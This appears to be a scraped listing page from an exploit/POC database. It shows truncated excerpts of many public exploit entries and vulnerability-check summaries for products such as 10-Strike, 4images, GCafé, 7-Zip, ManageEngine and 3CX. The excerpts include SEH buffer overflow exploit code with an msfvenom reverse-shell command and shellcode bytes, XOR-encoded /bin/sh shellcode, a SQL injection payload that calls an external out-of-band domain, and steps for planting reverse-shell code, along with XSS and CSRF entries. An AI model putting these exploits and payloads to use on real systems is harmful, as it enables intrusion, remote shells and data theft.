?day POC 漏洞数据库

# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path # Google Dork: N/A # Date: 2019-11-09 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage: https://gcafe.vn/ # Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0 # Version: v3.0 # Tested on: Windows 7, Win 10, WinXP # CVE : N/A # Description: # GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points # PoC: # wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto #C:\>sc qc gbClientServ…

(Authenticated) ManageEngine ServiceDesk Plus MSP - CVE-2022-47966: Unauthenticated remote code execution Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 01/18/2023 Created 01/25/2023 Added 01/24/2023 Modified 06/06/2023 Description Unauthenticated remote code execution vulnerability in various ManageEngine products due to the usage of an outdated third party dependency, Apache Santuario. Solution(s) auth-manageengine-sdp-msp-cve-2022-47966 References https://attackerkb.com/topics/cve-2022-47966 CVE - 2022-47966 https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html https://www.rapid7.com/blog/p…

# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] # Shellcode Author: Alexys (0x177git) # Tested on: Linux (x86_64) # Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh)) # Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram # Original code: [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm) ---- Assembly code ---- section .text global _start _start: xor eax, eax xor edx, edx ; clear rdx (ar…

# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery # Exploit Author: Abhishek Joshi # Date: March 25, 2021 # Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download # Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip # Version: 0.1 # Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 # Tested against: Firefox 78.7.0esr (64-bit) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on…

# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass # Date: 2022-07-25 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/patrickfuller # Software Link: https://github.com/patrickfuller/camp # Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1 # Tested on: Ubuntu 20.04 # CVE : CVE-2022-37109 "camp" Raspberry Pi camera server Authentication Bypass vulnerability https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904 1. Start an instance of the "camp" server: python3 server.py --require-login 2. Fetch the SHA-512 password hash using one of these methods: curl ht…

# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR) # Exploit Author: Bobby Cooke # Date: 2020-07-07 # Vendor Site: https://www.10-strike.com/ # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe # Tested On: Windows 10 - Pro 1909 (x86) # Version: version 3.9 # Exploit Details: # 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection. # 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time. # - StackPivot…

# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Step to discover Unquoted Service Path: C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto # Service info: C:\…

# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH) # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open the Application # 4.- Go to 'Main' or 'Computers' # 5.- Click upon 'Add' # 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card" # 7.- Click "OK" # 8.- Profit # Blog wh…

# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH) # Date: 2020-09-02 # Exploit Author: Sectechs # Vendor Homepage: https://www.10-strike.com # Version: 8.65 # Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A"* 209 # jmp short 8 # kali@root:msf-nasm_shell # nasm> jmp short 8 Next_SE_Pointer = "\xeb\x06\x90\x90" # 61e8497a SE_Handler="\x7a\x49\xe8\x61" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed payload = ( "\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "…

# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) # Date: 2020-03-30 # Exploit Author: Hodorsec # Version: 9.03 # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Vendor Homepage: https://www.10-strike.com # Tested on: Win8.1 x64 - Build 9600 # Description: # - Exploits the functionality to load a list of computers from a file # - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP # - Used a jump after ROP to go to a buffer for more space # Reproduction: # - Run the script, a TXT file will be generated # - Ope…

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) # Date: 2020-12-22 # Exploit Author: Florian Gassner # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.05 # Tested on: Windows 10 x64 # Computer -> From Text File -> Choose exploit.txt import struct """ Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214 """ OFFSET = 214 """ badchars = '\x00\x09\x0a\x0d\x3a\x5c' """ """ Log data, item 23 Address=01015AF4 Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [Network…

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 04-11-2021 # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Tested Version: 9.31 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files (x86)\10-Strike Networ…

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH) # Date: 2021-10-31 # Exploit Author: ro0k # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.31 # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 # Proof of Concept: # 1.Run python2 exploit.py to generate overflow.txt # 2.Transfer overflow.txt to the Windows 10 machine # 3.Setup Netcat listener on attacker machine # 4.Open 10-Strike Network Inventory Explorer Pro # 5.Select Computers tab from the uppermost set of tabs # 6.Select From Text File option # 7.Open overflow.…

## Title: 101 News-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/16/2023 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The searchtitle parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' was submitted in the searchtitle parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The applicatio…

# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH) # Date: 2020-04-01 # Exploit Author: Hodorsec # Version: v9.32 x86 # Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe # Vendor Homepage: https://www.freecommander.com # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be …

****************************************************************** * 1CRM On-Premise Software 8.5.7 * * Stored XSS * ****************************************************************** //////////////////////////////////////////////////////////////////////////////////// # Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting # Date: 19/07/2019 # Exploit Author: Kusol Watchara-Apanukorn # Vendor Homepage: https://1crm.com/ # Version: 8.5.7 <= # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-14221 ////////////////////////////////////////////////////////////////////////…

3CX: CVE-2023-29059: Desktop app backdoor Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/29/2023 Created 03/30/2023 Added 03/30/2023 Modified 04/12/2023 Description The 3CX desktop client available for Windows and Mac has been trojanised and is currently providing a backdoor in a in a suspected state-sponsored threat campaign. This check is flagging on the detection of the desktop app before 18.12.425 due to 3CX advising to avoid using the Electron App at all unless there is absolutely no alternative. Solution(s) 3cx-desktop-app-backdoor References https://attackerkb.com/topics/cve-2023-29059 CVE - 2023-29…

# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.8 # Tested on: Linux Source Analysis: Line #658 - User action defined if ($action == "findimages") { Line #661 - Vulnerable condition $condition = "1=1"; Line #654 - Default limit 50 show_input_row($lang['results_per_page'], "limitnumber", 50); Line #736 - Define limit start $limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : ""; if ($limitstart == "") { $limitstart = 0; Line #743 - Define limit number $limitnumber = trim($HTTP_…

# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 # Version: 4Images Gallery 1.8 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27308 -Description: A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. -Steps to reproduce: 1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) 2- Enter the credentials , Turn on the intercept and c…

# Exploit Title: 4images 1.9 - Remote Command Execution (RCE) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d= efault_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=3D1" // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 1…

# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting # Date: 30-12-2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/download-4images # Version: 1.7.11 # Tested on: Windows 10/Kali Linux Vulnerable Parameters: Profile Image. Attack Vector: This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload. Steps-To-Reproduce: 1. Login into 4images admin panel. 2. Now go to the add images tab. 3. Now paste the belo…

# Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability # Google Dork: N/A # Date: 2020-02-10 # Exploit Author: Unkn0wn # Vendor Homepage: http://davidvg.com/ # Software Link: https://www.opensourcecms.com/60cyclecms # Version: 2.5.2 # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- SQL Injection vulnerability: ---------------------------- in file /common/lib.php Line 64 -73 * function getCommentsLine($title) { $title = addslashes($title); $query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'"; // query MySQL server $result=mysql_query($query) or die("MySQL Query fail: $query"); $numComments = mysql_num_row…

# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 12.09.2023 # Vendor Homepage: http://www.7stickynotes.com # Software Link: http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe # Tested Version: 1.9 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the program. # Click on "New Note". # Navigate to the "Alarms" tab. # Click on either of the two buttons. # From the "For" field, select "1" and "seconds" (to obtain the shell within 1 second). # From the "Action" dropdown, select "command". # In the activated box, enter the reverse shell command and click the "Set" …

7-Zip: CVE-2023-31102: 7Z File Parsing Integer Underflow Remote Code Execution Vulnerability Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 08/23/2023 Created 09/15/2023 Added 09/15/2023 Modified 07/26/2024 Description Deprecated Solution(s)

7-Zip: CVE-2023-31102: CWE-191 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 11/03/2023 Created 07/27/2024 Added 07/26/2024 Modified 12/19/2024 Description Ppmd7.c in 7-Zip before 23.00 allows an integer underflow and invalid read operation via a crafted 7Z archive. Solution(s) 7-zip-7-zip-upgrade-latest References https://attackerkb.com/topics/cve-2023-31102 CVE - 2023-31102 https://www.7-zip.org/download.html https://www.zerodayinitiative.com/advisories/ZDI-23-1165/ https://sourceforge.net/p/sevenzip/discussion/45797/thread/713c8a8269/ https://security.netapp.com/advisory/ntap-20231110-0007/ https://ds-security.…